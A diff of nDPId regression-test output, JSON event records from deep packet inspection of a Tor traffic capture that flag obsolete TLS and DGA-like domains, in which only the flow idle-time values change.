+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822132212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822132203,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} -00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01047{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -01053{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01047{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +01053{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822134212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822133931,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} @@ -249,12 +249,12 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2070,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822190212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822190886,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822190886,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822190886,"flow_last_seen":1383822190886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822190886,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822192212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822192034,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822194212} @@ -347,12 +347,12 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822276211} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -01050{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +01050{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 